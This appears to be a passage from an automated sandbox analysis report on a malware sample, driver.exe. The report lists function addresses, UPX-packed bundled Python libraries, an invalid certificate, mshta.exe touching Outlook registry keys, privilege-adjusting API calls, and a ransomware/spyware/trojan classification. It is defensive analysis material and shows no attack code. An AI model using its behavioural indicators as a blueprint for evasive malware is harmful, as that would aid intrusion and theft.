              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542586C477_2_00007FF7542586C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75427A71077_2_00007FF75427A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75428071077_2_00007FF754280710
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75428270077_2_00007FF754282700
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542517C877_2_00007FF7542517C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542667E077_2_00007FF7542667E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425289077_2_00007FF754252890
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75424888477_2_00007FF754248884
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542918A877_2_00007FF7542918A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75428190C77_2_00007FF75428190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75427090477_2_00007FF754270904
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542738E877_2_00007FF7542738E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75428216477_2_00007FF754282164
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542A41CC77_2_00007FF7542A41CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542881CC77_2_00007FF7542881CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75424F24C77_2_00007FF75424F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75426724477_2_00007FF754267244
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425E21C77_2_00007FF75425E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75429226877_2_00007FF754292268
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425D2C077_2_00007FF75425D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542802A477_2_00007FF7542802A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75429131477_2_00007FF754291314
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542442E077_2_00007FF7542442E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75429832C77_2_00007FF75429832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75427037477_2_00007FF754270374
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425236077_2_00007FF754252360
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75426C3E077_2_00007FF75426C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75428546877_2_00007FF754285468
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75426D45877_2_00007FF75426D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75424A50477_2_00007FF75424A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754270D2077_2_00007FF754270D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754289D7477_2_00007FF754289D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754291DCC77_2_00007FF754291DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75424EE0877_2_00007FF75424EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754251E0477_2_00007FF754251E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75428AE5077_2_00007FF75428AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75424CE8477_2_00007FF75424CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75429FE7477_2_00007FF75429FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754258E6877_2_00007FF754258E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75428EEA477_2_00007FF75428EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75427AF0C77_2_00007FF75427AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754249EFC77_2_00007FF754249EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754275F4C77_2_00007FF754275F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542AAF9077_2_00007FF7542AAF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75427C00C77_2_00007FF75427C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754284FE877_2_00007FF754284FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542ADFD877_2_00007FF7542ADFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75427804077_2_00007FF754278040
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425303077_2_00007FF754253030
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75427007477_2_00007FF754270074
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75426C05C77_2_00007FF75426C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75426010477_2_00007FF754260104
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542A00F077_2_00007FF7542A00F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75427D91C77_2_00007FF75427D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75426D97C77_2_00007FF75426D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542449B877_2_00007FF7542449B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542869FD77_2_00007FF7542869FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75427FA6C77_2_00007FF75427FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754285A7077_2_00007FF754285A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542AAAC077_2_00007FF7542AAAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75424CB1477_2_00007FF75424CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754284B3877_2_00007FF754284B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754299B9877_2_00007FF754299B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754258C3077_2_00007FF754258C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754285C8C77_2_00007FF754285C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754269D0C77_2_00007FF754269D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754296D0C77_2_00007FF754296D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75424DD0477_2_00007FF75424DD04
              Source: C:\Users\user\Desktop\driver.exeCode function: String function: 00007FF8A80BDB03 appears 45 times
              Source: C:\Users\user\Desktop\driver.exeCode function: String function: 00007FF8A80BD32F appears 324 times
              Source: C:\Users\user\Desktop\driver.exeCode function: String function: 00007FF8A80BD341 appears 1192 times
              Source: C:\Users\user\Desktop\driver.exeCode function: String function: 00007FF8A80BD33B appears 39 times
              Source: C:\Users\user\Desktop\driver.exeCode function: String function: 00007FF8A80BD425 appears 48 times
              Source: C:\Users\user\Desktop\driver.exeCode function: String function: 00007FF6A29B2710 appears 104 times
              Source: C:\Users\user\Desktop\driver.exeCode function: String function: 00007FF8A8659350 appears 100 times
              Source: C:\Users\user\Desktop\driver.exeCode function: String function: 00007FF8A865A510 appears 88 times
              Source: C:\Users\user\Desktop\driver.exeCode function: String function: 00007FF8A8041325 appears 518 times
              Source: C:\Users\user\Desktop\driver.exeCode function: String function: 00007FF6A29B2910 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: String function: 00007FF7542849F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: String function: 00007FF754258444 appears 48 times
              Source: driver.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: driver.exeBinary or memory string: OriginalFilename vs driver.exe
              Source: driver.exe, 00000000.00000003.2061307753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000003.2053185543.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2051128075.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2049905637.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000003.2054053292.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2053107068.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2050389879.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2053425753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2050911487.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2060369011.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000003.2049719363.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000003.2049386542.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenMagnifier.exej% vs driver.exe
              Source: driver.exe, 00000000.00000003.2052849472.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2049030918.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs driver.exe
              Source: driver.exe, 00000000.00000003.2051305695.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2052933128.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2050006207.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000003.2052601392.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2050665502.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2052186692.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2049613615.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000003.2053891584.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2049812241.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000003.2053705049.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2049276107.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000003.2050203653.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2051216435.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2052114302.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2060818691.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2050744012.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2060487064.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs driver.exe
              Source: driver.exe, 00000000.00000003.2050107027.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2049187512.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000003.2053818515.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2050305577.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2050573747.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2053584283.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2053499525.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2052770906.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2052365271.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2053032876.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2053261566.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2052527881.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2049537467.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs driver.exe
              Source: driver.exe, 00000000.00000003.2052283988.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2051451471.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2050482974.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2052448279.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2052032548.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs driver.exe
              Source: driver.exe, 00000000.00000003.2053342813.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2052687607.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exe, 00000000.00000003.2051019921.000001C6D7277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs driver.exe
              Source: driver.exeBinary or memory string: OriginalFilename vs driver.exe
              Source: driver.exe, 00000002.00000002.2453899397.00007FF8B7E68000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs driver.exe
              Source: driver.exe, 00000002.00000002.2453172755.00007FF8B7E42000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs driver.exe
              Source: driver.exe, 00000002.00000002.2455512920.00007FF8B8F96000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs driver.exe
              Source: driver.exe, 00000002.00000002.2449471266.00007FF8A861A000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs driver.exe
              Source: driver.exe, 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenMagnifier.exej% vs driver.exe
              Source: driver.exe, 00000002.00000002.2455020204.00007FF8B8B4A000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs driver.exe
              Source: driver.exe, 00000002.00000002.2455870767.00007FF8B93D8000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs driver.exe
              Source: driver.exe, 00000002.00000002.2454577510.00007FF8B8B14000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs driver.exe
              Source: driver.exe, 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs driver.exe
              Source: driver.exe, 00000002.00000002.2456924312.00007FF8BA4FC000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs driver.exe
              Source: driver.exe, 00000002.00000002.2452420004.00007FF8A8F2C000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs driver.exe
              Source: driver.exe, 00000002.00000002.2456610950.00007FF8B9F7A000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs driver.exe
              Source: driver.exe, 00000002.00000002.2451999449.00007FF8A8E27000.00000004.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython313.dll. vs driver.exe
              Source: driver.exe, 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs driver.exe
              Source: driver.exe, 00000002.00000002.2452733742.00007FF8B7E03000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs driver.exe
              Source: driver.exe, 00000002.00000002.2456239486.00007FF8B984C000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs driver.exe
              Source: driver.exe, 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs driver.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Users\user\Desktop\driver.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\driver.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python313.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994215874784359
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9980279432552503
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9925709355828221
              Source: driver.exe, 00000002.00000003.2080557147.000001C0EDBC5000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1.vbP
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@161/105@2/3
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425CAFC GetLastError,FormatMessageW,77_2_00007FF75425CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75428B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,77_2_00007FF75428B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,77_2_00007FF75425EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754263144 GetDiskFreeSpaceExW,77_2_00007FF754263144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
              Source: C:\Windows\System32\SIHClient.exeMutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
